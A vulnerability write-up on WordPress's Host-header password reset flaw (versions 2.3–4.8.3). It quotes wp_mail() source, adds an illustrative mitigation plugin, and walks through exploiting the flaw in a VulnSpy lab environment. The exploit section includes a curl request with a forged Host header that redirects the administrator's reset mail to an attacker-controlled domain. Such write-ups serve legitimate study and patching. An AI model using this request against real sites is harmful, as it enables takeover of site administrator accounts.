WordPress is the most widely used content management system today. According to w3tech statistics, around 30% of the world's Web sites are based on WordPress.
WordPress 2.3-4.8.3's password reset function uses the HTTP_HOST header directly as part of the password reset mail's headers, which an attacker can exploit to steal the content of the password reset mail.
In this article, we use VulnSpy's online WordPress environment to demonstrate exploitation of this vulnerability.
ANALYSIS
In WordPress, the wp_mail() function is used to send mail. If no From address is set when sending, 'wordpress@' followed by $_SERVER['SERVER_NAME'] is used as the From address of the mail. On most Web servers the SERVER_NAME variable comes from the HTTP_HOST header of the client request, which means that the From address is user-controlled.
The function wp_mail() is declared in the file WordPress/wp-includes/pluggable.php:
    function wp_mail( $to, $subject, $message, $headers = '', $attachments = array() ) {
        // ... omitted ...
        if ( !isset( $from_email ) ) {
            // Get the site domain and get rid of www.
            // SERVER_NAME is usually populated from the client's Host header.
            $sitename = strtolower( $_SERVER['SERVER_NAME'] );
            if ( substr( $sitename, 0, 4 ) == 'www.' ) {
                $sitename = substr( $sitename, 4 );
            }
            $from_email = 'wordpress@' . $sitename;
        }
        /**
         * Filters the email address to send from.
         *
         * @since 2.2.0
         *
         * @param string $from_email Email address to send from.
         */
        $from_email = apply_filters( 'wp_mail_from', $from_email );
        /**
         * Filters the name to associate with the "from" email address.
         *
         * @since 2.3.0
         *
         * @param string $from_name Name associated with the "from" email address.
         */
        $from_name = apply_filters( 'wp_mail_from_name', $from_name );
        $phpmailer->setFrom( $from_email, $from_name );
        // ... omitted ...
    }
In some cases the mail server uses the From address directly as the Return-Path, and when delivery fails the message is returned to the Return-Path address automatically. Because the From address of a WordPress password reset mail is user-controlled, the reset mail can therefore end up at a malicious mail server.
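As an added example (not code from the article or from WordPress core; function and file names are hypothetical), a must-use plugin that uses the wp_mail_from filter shown above to replace the SERVER_NAME-derived From address with one built from the home URL stored in the database, plus a second layer that refuses reset requests whose Host header does not match the configured site host:

```php
<?php
/**
 * Plugin Name: Pinned wp_mail From address (example mitigation)
 *
 * Save as wp-content/mu-plugins/pinned-mail-from.php (hypothetical name).
 * wp_mail() applies the 'wp_mail_from' filter after deriving its default
 * From address from $_SERVER['SERVER_NAME'], so a callback can swap that
 * request-derived value for one built from the stored home URL, which the
 * client's Host header cannot influence.
 */

// Hypothetical helper: build 'wordpress@<host>' from a site URL,
// mirroring the 'www.' stripping that wp_mail() performs itself.
function vs_example_from_address_for_url( $site_url, $fallback ) {
    $host = parse_url( $site_url, PHP_URL_HOST );
    if ( empty( $host ) ) {
        return $fallback; // no usable host configured; keep the original
    }
    $host = strtolower( $host );
    if ( substr( $host, 0, 4 ) === 'www.' ) {
        $host = substr( $host, 4 );
    }
    return 'wordpress@' . $host;
}

// Filter callback: ignore the SERVER_NAME-derived address and use the
// home URL from wp_options instead.
function vs_example_pinned_mail_from( $from_email ) {
    return vs_example_from_address_for_url( home_url(), $from_email );
}
add_filter( 'wp_mail_from', 'vs_example_pinned_mail_from' );

// Second layer: 'lostpassword_post' receives the WP_Error that
// retrieve_password() checks; adding an error aborts the reset.
// Caveat: behind a reverse proxy that rewrites Host, compare against
// the hostname the proxy forwards instead.
function vs_example_check_lostpassword_host( $errors ) {
    $expected = strtolower( (string) parse_url( home_url(), PHP_URL_HOST ) );
    $request  = isset( $_SERVER['HTTP_HOST'] ) ? strtolower( $_SERVER['HTTP_HOST'] ) : '';
    $request  = preg_replace( '/:\d+$/', '', $request ); // drop a trailing :port
    if ( $expected !== '' && $request !== $expected ) {
        $errors->add( 'bad_host', 'Password reset refused: unexpected Host header.' );
    }
}
add_action( 'lostpassword_post', 'vs_example_check_lostpassword_host' );
```

With the filter in place, the curl request below still reaches wp-login.php, but the resulting mail carries the configured domain in its From header regardless of the Host value sent.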
EXPLOIT
1. Click the START TO HACK button at the top right of the page and use VSPlate to create the online environment automatically.
2. Install WordPress.
Note: The administrator e-mail address here is set to the nonexistent address [email protected], which simulates a DNS/DoS attack that causes delivery of the password reset mail to the administrator to fail.
3. Log into the VSPlate online terminal.
4. Create an email account such as [email protected].
Note: yourdomain.com is your own domain name. You can use a free enterprise email service to set up e-mail addresses. We use [email protected] in the demonstration.
5. Send a password reset request via the online terminal with a modified HTTP_HOST header.
We use the online terminal to simulate an attack on a WordPress website on the intranet.
Run this command in the online terminal:
curl -v 'http://127.0.0.1/wp-login.php?action=lostpassword' -H 'Host: vulnspy.com' --data 'user_login=admin&redirect_to=&wp-submit=Get+New+Password'
If sending the mail fails, the message is forwarded to [email protected] automatically. That is, the mail intended for the administrator [email protected] is delivered to [email protected] instead.
6. Use [email protected] to receive the mail.
If successful, [email protected] will receive a password reset mail.
7. Reset the password.